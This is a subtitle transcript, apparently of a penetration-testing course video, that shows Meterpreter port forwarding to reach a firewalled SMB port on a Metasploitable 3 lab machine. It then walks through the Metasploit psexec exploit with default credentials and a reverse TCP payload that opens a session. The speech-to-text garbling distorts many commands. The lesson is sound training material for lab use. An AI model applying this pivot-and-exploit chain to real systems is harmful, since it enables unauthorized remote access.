1
00:00:00,630 --> 00:00:02,650
Now, you may have heard about S.

2
00:00:02,670 --> 00:00:08,610
S H port forwarding, if you have, you will be somewhat familiar with this section.

3
00:00:10,330 --> 00:00:17,410
However, the port forwarding technique used an interpreter is likely S.H. port forwarding so.

4
00:00:18,380 --> 00:00:25,190
This functionality will give you access to the ports on the target that you can't otherwise reach.

5
00:00:26,690 --> 00:00:31,950
So to understand how this works, I'll just indulge me a moment, will you?

6
00:00:32,000 --> 00:00:33,320
I'll tell you a little story.

7
00:00:34,460 --> 00:00:41,000
Think of a penetration test that you successfully compromise and gain access to a target.

8
00:00:42,390 --> 00:00:50,730
You with me so far, but you are not allowed to access Port three three, eight, nine and for four

9
00:00:50,730 --> 00:00:55,650
or five, which can only be locally accessed for security reasons.

10
00:00:57,210 --> 00:01:02,670
So at this point, you need to forward these ports on the target to yourself.

11
00:01:04,050 --> 00:01:11,130
So by using these port forwarding techniques and interpreter, you can reach a port on a target that

12
00:01:11,130 --> 00:01:14,070
you can't reach by any other way necessary.

13
00:01:15,000 --> 00:01:21,540
It just so happens the interpreter put forward command does all of this magic for us.

14
00:01:22,720 --> 00:01:27,910
And it's going to relay TCP connections to and from the connected machines.

15
00:01:29,910 --> 00:01:34,110
So I'm going to assume you already have an interpreter shell, like I do here.

16
00:01:35,340 --> 00:01:43,890
I also have a system level session on metastable three using when R.M. as they exploit that you've discovered

17
00:01:43,890 --> 00:01:44,400
before.

18
00:01:45,870 --> 00:01:48,140
So, all right, same page, same page.

19
00:01:49,210 --> 00:01:55,570
So let me first check if I can reach port for four or five after enabling Windows firewall on my disposable

20
00:01:55,570 --> 00:01:55,900
three.

21
00:01:57,040 --> 00:01:58,290
So I'll open up a new tab.

22
00:02:00,220 --> 00:02:07,750
And map he for four or five reason tend 10 that to that 10.

23
00:02:09,440 --> 00:02:10,880
And the port is filtered.

24
00:02:12,230 --> 00:02:17,960
So this will mean that the port is behind the firewall and it won't give us a response.

25
00:02:19,050 --> 00:02:21,330
So we'll go back to the interpreter session.

26
00:02:22,650 --> 00:02:26,820
Type in shell as my command to get into the window shell.

27
00:02:28,010 --> 00:02:34,030
I want to check if Port 445 is really closed or whatever it's doing.

28
00:02:35,240 --> 00:02:44,120
So I'll type net, stat A. pipe, find a star for four or five.

29
00:02:45,860 --> 00:02:52,100
Now, as you see here, bought for four or five is listening on the local.

30
00:02:53,340 --> 00:02:55,230
OK, so exit the show.

31
00:02:57,520 --> 00:03:04,780
And now you discover that bought for four or five is open on the target, but you can't access it to

32
00:03:04,780 --> 00:03:08,380
make a Pesek or execute something else on that board.

33
00:03:09,830 --> 00:03:15,260
And that's why, thankfully, interpretor put forward command will give us a hand.

34
00:03:17,230 --> 00:03:18,220
Port forward.

35
00:03:19,410 --> 00:03:20,070
H.

36
00:03:21,200 --> 00:03:27,920
Help menu is awfully clear, so you can create port forwards and manage them.

37
00:03:29,630 --> 00:03:31,790
And I'm going to list if I have any.

38
00:03:32,810 --> 00:03:34,340
Put forward list.

39
00:03:35,950 --> 00:03:36,760
No, I don't have any.

40
00:03:38,250 --> 00:03:40,870
So it only takes a few seconds to add some.

41
00:03:42,450 --> 00:03:46,230
To add a put forward rule type port forward.

42
00:03:49,120 --> 00:03:54,010
Then L for the local board on your system and then.

43
00:03:54,970 --> 00:03:57,880
P for the port on the target.

44
00:03:58,870 --> 00:04:04,570
And finally, Ed, are to specify the target I.P. address.

45
00:04:05,970 --> 00:04:07,380
And then you can add a rule.

46
00:04:08,470 --> 00:04:09,820
So now let's list it again.

47
00:04:11,350 --> 00:04:13,930
All righty, then, you have a poured forward rule.

48
00:04:15,930 --> 00:04:20,060
So, you know, this forward rule is even valid outside Métis Point.

49
00:04:21,110 --> 00:04:22,400
So let's go to another tab.

50
00:04:23,660 --> 00:04:26,180
And now I will make an end map scan.

51
00:04:27,680 --> 00:04:30,560
But this time I'm going to use my localhost i.p.

52
00:04:31,470 --> 00:04:37,050
As well as the port that I binde remote port for four or five due to 40.

53
00:04:38,060 --> 00:04:45,050
So now the query will be and map P four for four or five reason.

54
00:04:46,460 --> 00:04:49,790
One two seven zero zero one.

55
00:04:51,990 --> 00:04:57,300
And I can see now, what, four, four, four, five is open on my localhost.

56
00:04:58,430 --> 00:05:00,980
Now, it doesn't really make sense, you know.

57
00:05:01,960 --> 00:05:09,130
So add as V to this query to identify the service information.

58
00:05:10,890 --> 00:05:13,240
And because of the fording is a little slow.

59
00:05:14,280 --> 00:05:15,690
OK, well, not that much.

60
00:05:17,730 --> 00:05:24,600
So have a look at that and map the Texas areas on my local port for four or five is a Microsoft service,

61
00:05:24,600 --> 00:05:28,440
which means the assembly service is running on that port.

62
00:05:29,900 --> 00:05:31,490
So I can go back to Métis Point.

63
00:05:33,120 --> 00:05:34,350
Background session.

64
00:05:35,630 --> 00:05:42,050
Now, the last step is making a PSA back to target over 40.

65
00:05:42,860 --> 00:05:45,380
So first, let me choose this exact.

66
00:05:46,250 --> 00:05:47,420
Use, exploit.

67
00:05:48,370 --> 00:05:49,030
Windows.

68
00:05:49,950 --> 00:05:52,520
SMB, yes, exactly.

69
00:05:54,270 --> 00:05:55,920
Show me the options.

70
00:05:57,850 --> 00:05:58,840
Said our host.

71
00:05:59,990 --> 00:06:03,410
To one two seven zero zero one.

72
00:06:04,400 --> 00:06:07,970
And it's the same logic for what we use for Inmet.

73
00:06:09,150 --> 00:06:15,450
So because I need to exploit the service running on board for four or five on my localhost, which forwards

74
00:06:15,450 --> 00:06:20,970
everything to work for four or five on my disposable three, so.

75
00:06:21,980 --> 00:06:25,910
Set our report to four for four or five.

76
00:06:27,080 --> 00:06:30,050
Set SMB user to vagrant.

77
00:06:31,060 --> 00:06:35,190
And SMB pass to Vagrant as well.

78
00:06:36,610 --> 00:06:37,420
Set payload.

79
00:06:39,550 --> 00:06:42,340
To Windows interpreter.

80
00:06:43,900 --> 00:06:45,600
Reverse TCP.

81
00:06:47,040 --> 00:06:50,700
Said, I'll host to the IP address of your colleague.

82
00:06:52,260 --> 00:06:57,720
Said support to something that you want, let's choose 555.

83
00:06:59,010 --> 00:07:05,570
And I think I set up everything, but double checking is always better, so show the options again.

84
00:07:08,040 --> 00:07:12,090
And nothing extra to configure so that I can exploit.

85
00:07:14,390 --> 00:07:16,260
And I think that boy is doing quite well.

86
00:07:17,960 --> 00:07:23,870
So this point, sometimes sessions don't open or sometimes two sessions open.

87
00:07:24,780 --> 00:07:27,330
So you can try it again, don't worry.

88
00:07:28,560 --> 00:07:31,680
And the session opened by using the gorgeous duo.

89
00:07:32,830 --> 00:07:34,000
Get UID.

90
00:07:36,030 --> 00:07:36,480
Info.

91
00:07:38,670 --> 00:07:44,460
And you successfully make yes, exactly, and have a session on Métis voidable three.